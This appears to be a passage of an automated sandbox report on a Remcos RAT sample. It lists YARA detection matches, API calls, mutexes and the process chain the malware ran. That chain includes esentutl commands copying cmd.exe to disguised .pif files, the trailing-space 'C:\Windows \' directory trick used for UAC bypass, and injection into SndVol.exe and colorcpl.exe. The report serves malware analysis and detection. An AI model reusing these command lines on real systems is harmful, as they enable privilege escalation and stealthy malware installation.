Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@34/10@4/4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02936AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 6_2_02936AB7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02956AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 19_2_02956AB7
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D37FD2 GetDiskFreeSpaceA, 0_2_02D37FD2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 6_2_0292E219
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D46DC8 CoCreateInstance, 0_2_02D46DC8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293A63F FindResourceA,LoadResource,LockResource,SizeofResource, 6_2_0293A63F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02939BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 6_2_02939BC4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe File created: C:\Users\Public\Libraries\PNO Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Windows\SysWOW64\SndVol.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: jW3NEKvxH1.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe File read: C:\Users\user\Desktop\jW3NEKvxH1.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\jW3NEKvxH1.exe "C:\Users\user\Desktop\jW3NEKvxH1.exe"
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown Process created: C:\Users\Public\Libraries\Dlaybpxl.PIF "C:\Users\Public\Libraries\Dlaybpxl.PIF"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: unknown Process created: C:\Users\Public\Libraries\Dlaybpxl.PIF "C:\Users\Public\Libraries\Dlaybpxl.PIF"
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" " Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??????p??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
